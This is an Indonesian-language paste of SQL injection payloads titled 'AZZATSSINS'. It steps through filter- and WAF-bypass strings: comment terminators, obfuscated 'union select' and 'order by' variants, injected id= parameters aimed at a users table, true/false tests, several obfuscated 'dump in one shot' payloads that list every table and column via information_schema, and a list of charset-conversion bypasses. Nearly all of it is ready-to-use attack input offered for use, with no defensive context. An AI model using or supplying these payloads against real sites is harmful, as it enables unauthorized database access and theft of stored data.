SHOW:
|
|
- or go back to the newest paste.
1 | ============================================= | |
2 | ========= [ ! ] AZZATSSINS [ ! ] ============ | |
3 | ============================================= | |
4 | ||
5 | Note: | |
6 | Semua String Bypass Di Bawah, Saya Ambil Referensi Dari Berbagai Sumber (youtube, group SQLi FB, Forum, DLL) | |
7 | ||
8 | Thx : For ALL Injector | |
9 | ||
10 | # pertama kita cek comentingnya/errornya | |
11 | '-- | |
12 | '--+ | |
13 | '+--+ | |
14 | ')-- | |
15 | ')--+ | |
16 | ')+--+ | |
17 | '))--+ | |
18 | ')))--+ | |
19 | '%23 | |
20 | '%60 | |
21 | '%90 | |
22 | '/* | |
23 | ';%00 | |
24 | "-- - | |
25 | "--+- | |
26 | "%23 | |
27 | ")-- - | |
28 | ")--+- | |
29 | "))--+- | |
30 | ";%00 | |
31 | ") ;%00 | |
32 | "));%00 | |
33 | "%60 | |
34 | "%90 | |
35 | ||
36 | ||
37 | ||
38 | ||
39 | # kemudian kita cari column nya | |
40 | order+by | |
41 | group+by | |
42 | order/**/by | |
43 | order/**_**/by | |
44 | /*!42247order*//**//*!42247by*/ | |
45 | %0aorder%0aby%0a | |
46 | ||
47 | ||
48 | # kemudian kita cari column yg vuln | |
49 | union+select | |
50 | union/**/select | |
51 | union/**_**/select | |
52 | /*!42247union*//**//*!42247select*/ | |
53 | %0aunion%0aselect | |
54 | union+distinct+select | |
55 | union+distinctROW+select | |
56 | UNIunionON+SELselectECT | |
57 | uni<on+sel<ect | |
58 | uni<>on+sel<>ect | |
59 | Union+–+Select | |
60 | union(/*!/**/SeleCT*/+1,2,3) | |
61 | /**_**/UnIoN(SeLeCt+1,2,3) | |
62 | union(select+(1),(2),(3)) | |
63 | UnIoN%A0SeLeCt*FrOm( SeLeCt 1)a join | |
64 | UnIoN%A0SeLeCt+1,2,3,~4,~5 | |
65 | UnIoN%A0SeLeCt+1,2,3,.4,.5 | |
66 | UnIoN%A0SeLeCt+1,2,3,'4','5' | |
67 | "9e0UnIoN+SeLeCt | |
68 | UnIoN+SeLeCt%74 | |
69 | The Methods | |
70 | . | |
71 | id=1.unioN/**/distinct%20%73eleCt""a | |
72 | id=1%.0unioN/**/distinct%20%73eleCt+-!~ | |
73 | id=1%""unioN/**/distinct%20%73eleCt@$% | |
74 | id=1%''unioN/**/distinct%20%73eleCt@%C0% | |
75 | id=1-.0unioN/**/distinct%20%73eleCt@%C0/ | |
76 | id=1=\NunioN/**/distinct%20%73eleCt@%FF| | |
77 | id=1<0.unioN/**/distinct%20%73eleCt@= | |
78 | id=1>0.unioN/**/distinct%20%73eleCt~. | |
79 | id=1e0unioN/**/distinct%20%73eleCt""$ | |
80 | id=1^0.unioN/**/distinct%20%73eleCt!~ | |
81 | id=1|""unioN/**/distinct%20%73eleCt\N$ | |
82 | id=1|''unioN/**/distinct%20%73eleCt\N%FF | |
83 | id=1|.0unioN/**/distinct%20%73eleCt!@ | |
84 | id=1|\NunioN/**/distinct%20%73eleCt""/ | |
85 | and @x:=database() UnIoN SeLect 1,@x,3 | |
86 | ’UnI”On’+'SeL”ECT’ | |
87 | union%23AZZATSSINS_AZZATSSINS_AZZATSSINS_AZZATSSINS%0Aselect | |
88 | union+select*from(select+1)a+join(select'AZZATSSINS')b+join+(select+version())c | |
89 | ||
90 | cth : | |
91 | id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- - | |
92 | id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- - | |
93 | id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- - | |
94 | id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- - | |
95 | id=1-.0unioN/**/distinct %73eleCt@%C0/a1,2,3.1from users-- - | |
96 | id=1=\NunioN/**/distinct %73eleCt@%FF|a1,2,3""from users-- - | |
97 | id=1<0.unioN/**/distinct %73eleCt@=a1,2,3''from users-- - | |
98 | id=1>0.unioN/**/distinct %73eleCt~.a1,2,3 from users-- - | |
99 | id=1e0unioN/**/distinct %73eleCt""$a1,2,3 from users-- - | |
100 | id=1^0.unioN/**/distinct %73eleCt!~a1,2,3 from users-- - | |
101 | id=1|""unioN/**/distinct %73eleCt\N$a1,2,3 from users-- - | |
102 | id=1|''unioN/**/distinct %73eleCt\N%FFa1,2,3 from users-- - | |
103 | id=1|.0unioN/**/distinct %73eleCt!@a1,2,3 from users-- - | |
104 | id=1|\NunioN/**/distinct %73eleCt""/a1,2,3 from users-- - | |
105 | ||
106 | ||
107 | # cek false true nya | |
108 | and+0 | |
109 | div+0 | |
110 | and+false | |
111 | having+0 | |
112 | having+1=0 | |
113 | and+1=0 | |
114 | limit 0 | |
115 | " and '1'='1 | |
116 | " and (1)=(1 | |
117 | where 1 /*!=*/ 2 | |
118 | and 2>3 | |
119 | /*!and/+1=0 | |
120 | and(1)=(0) | |
121 | /*!aND*/+1+like+0 | |
122 | +and+2>3+ | |
123 | and+(1)!=(0) | |
124 | and/**/0/**/ | |
125 | and/**_**/0/**_**/ | |
126 | and/**/false/**/ | |
127 | and/**_**/false/**_**/ | |
128 | /*!50000or*/1='1' | |
129 | /*!or*/1='1 | |
130 | ||
131 | # sekarang coba kita dump/dios | |
132 | concat_ws(0x3c62723e,0x415a5a41545353494e53,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)) | |
133 | ||
134 | concat_ws/**/(0x3c62723e,0x415a5a41545353494e53,database/**/(),version/**/(),user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!42247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@AZZATSSINS:=concat/**/(@AZZATSSINS,0x3c62723e,/*!42247table_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@AZZATSSINS))) | |
135 | ||
136 | (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) | |
137 | ||
138 | +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+ | |
139 | ||
140 | export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2) | |
141 | ||
142 | concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c) | |
143 | ||
144 | make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) | |
145 | ||
146 | ||
147 | replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e3c666f6e7420636f6c6f723d7265643e263c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d707572706c653e273c2f666f6e743e3c666f6e7420636f6c6f723d7265643e,0x24,0x3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e3e415a5a41545353494e532057415320484552453c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@) | |
148 | ||
149 | (select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)where+(table_schema!='information_schema')+and(0x00)in(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat(0x3c62723e,@tbl_sc:=table_schema,'+::',@tbl:=table_name,'+(Rows+',(select+table_rows+from+information_schema.tables+where+table_schema=@tbl_sc+and+table_name=@tbl),')',column_name),+(column_name))))))a) | |
150 | ||
151 | #Bypass convert | |
152 | *convert(concat(schema()+using+ascii) | |
153 | ujis | |
154 | ucs2 | |
155 | tis620 | |
156 | swe7 | |
157 | sjis | |
158 | macroman | |
159 | macce | |
160 | latin7 | |
161 | latin5 | |
162 | latin2 | |
163 | koi8u | |
164 | koi8r | |
165 | keybcs2 | |
166 | hp8 | |
167 | geostd8 | |
168 | gbk | |
169 | gb2132 | |
170 | armscii8 | |
171 | ascii | |
172 | binary | |
173 | cp1250 | |
174 | big5 | |
175 | cp1251 | |
176 | cp1256 | |
177 | cp1257 | |
178 | cp850 |